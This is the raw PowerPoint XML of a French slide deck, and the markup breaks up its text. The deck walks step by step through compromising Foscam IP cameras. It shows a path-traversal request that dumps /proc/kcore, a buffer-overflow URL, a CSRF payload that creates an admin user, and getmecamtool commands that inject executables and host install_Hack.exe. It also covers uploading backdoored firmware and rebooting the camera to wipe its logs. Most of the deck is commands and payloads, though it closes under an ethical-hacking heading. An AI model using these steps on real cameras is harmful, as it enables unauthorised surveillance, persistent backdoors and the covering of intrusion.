            <a:endParaRPr lang="fr-FR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457200" y="1219200"/>
            <a:ext cx="8363272" cy="50181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sz="2600" dirty="0"/>
              <a:t>Commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Installation 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1500" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@debian:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/NETWORK_TEST/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -h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A script for demonstrating the work of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>camtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> utilities 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Usage: ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; [OPTIONS] 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OPTIONS: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-c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; command (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>availble</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> commands are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_file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inject_exec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inject_proxy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poison_webui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-a &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; address of the camera 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-u &lt;username&gt; username for accessing the camera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-p &lt;password&gt; password for accessing the camera  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-e &lt;exec&gt; absolute path to executable file for injecting to the camera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-k &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; arguments with which the executable has to run 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-s &lt;path&gt; path to system firmware library folder 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 &lt;inject username&gt; username to create on the camera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-l &lt;inject password&gt; password for the new username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-w &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> patch&gt; absolute path to the Web UI patch file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-f &lt;file&gt; absolute path to the file for hosting on the camera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-o &lt;new port&gt; new port the camera firmware should listen on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-h display this message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fr-FR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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457200" y="1219200"/>
            <a:ext cx="8363272" cy="5018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fr-FR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" pitchFamily="49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47" y="1844824"/>
            <a:ext cx="7601640" cy="32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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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15</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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457200" y="1219200"/>
            <a:ext cx="8363272" cy="5018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fr-FR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" pitchFamily="49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21" y="1370166"/>
            <a:ext cx="3965029" cy="48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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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457200" y="1219200"/>
            <a:ext cx="8363272" cy="5018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fr-FR" sz="2800" dirty="0" smtClean="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648" y="1262038"/>
            <a:ext cx="8351840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600" dirty="0" err="1" smtClean="0"/>
              <a:t>Getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t> 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800" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> PATH=$PATH:$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t>)/../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t>/bin ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> -a X.X.X.X:80 -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> -p '' -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>host_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> -f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/install_Hack.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t>-s ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>fwlib</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612648" y="4003811"/>
            <a:ext cx="8351840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600" dirty="0" smtClean="0"/>
              <a:t>Commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>rePack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> du binaire 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dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syspack</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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457200" y="1219200"/>
            <a:ext cx="8363272" cy="5018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fr-FR" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console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dirty="0" err="1" smtClean="0"/>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> le nouveau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>irmeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> sur la caméra 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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console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7200800" cy="353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11 Effacer ses traces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18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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Un simple reboot de la caméra efface les logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Vérification du contenu des logs :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /get_log.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean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56992"/>
            <a:ext cx="806448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11 Effacer ses traces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19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3373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Reboot de la camera :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /reboot.cgi?user=admin&amp;pwd=paflechien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Lucida Console" pitchFamily="49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708920"/>
            <a:ext cx="45910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contenu 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="3933056"/>
            <a:ext cx="8229600" cy="1080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800" dirty="0" smtClean="0"/>
              <a:t>Vérification du contenu des logs :</a:t>
            </a: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fr-FR" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /get_log.cgi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869160"/>
            <a:ext cx="31146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Etape1 Trouver la victime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769640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>FOSCAM FI8910W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9292" t="11639" r="6152" b="5795"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518899" y="2132856"/>
            <a:ext cx="6581493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99592" y="5805264"/>
            <a:ext cx="712879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• Une caméra accessible depuis internet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20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2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://justreadthecode.wordpress.com/2013/09/26/ipcamera-fun/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>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.sector.ca/portals/17/Presentations13/ARTEM%20-Watching_the_watchers_%20hacking_wireless_IP_security_cameras.pdf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>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities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>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://archive.hack.lu/2013/ipcams-research-falcon-riva.pdf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>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>insidetrust.blogspot.fr/2011/08/using-hydra-to-dictionary-attack-web.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>bugs.debian.org/cgi-bin/bugreport.cgi?bug=518908</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000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Etical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Hacking: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21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3140968"/>
            <a:ext cx="8229600" cy="648072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>GitHub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https://github.com/Girakith/foscamTools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56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132856"/>
            <a:ext cx="47815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mtClean="0"/>
              <a:t>Etape 2 Trouver la version de l’hardware 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29680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Faille de sécurité n°1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Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://camera/get_status.cgi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3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827584" y="5229200"/>
            <a:ext cx="712879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• Le serveur Web est une fausse implémentation de CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>• Chaque requêtes est mappée a une fonction dans le serveur web, au lieu d’exécuter un programme externe.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3 Trouver les failles de la version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Audit : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.coresecurity.com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github.com/Girakith/foscamTools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Faille 1 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>attack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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /../../../../../../../../../proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kcore</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Faille 2 :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aaaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aaaa.htm</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Faille 3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>CSRF (Cross-Site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Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set_users.cgi?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user1=&amp;pwd1=&amp;pri1=2&amp;user2=&amp;pwd2=&amp;pri2=&amp;user3=&amp;pwd3=&amp;pri3=&amp;user4=&amp;pwd4=&amp;pri4=&amp;user5=&amp;pwd5=&amp;pri5=&amp;user6=&amp;pwd6=&amp;pri6=&amp;user7=&amp;pwd7=&amp;pri7=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user8=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;pwd8=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;pri8=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=http://www.google.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console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4 Récupération de /proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>kcore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073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Commande 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</a:rPr>
              <a:t>root@debian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:/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</a:rPr>
              <a:t>tmp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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lwp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-request -m GET -b http://XX.XX.XX.XX:XXXX -a "/../../../../../../../../../proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kcore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -s &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/RAM.bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Retour 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</a:rPr>
              <a:t>root@debian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:/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</a:rPr>
              <a:t>tmp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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tail RAM.bin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5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163" b="20922"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627784" y="4149080"/>
            <a:ext cx="2880320" cy="225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5 Analyse du dump /proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>kcore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6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713856"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
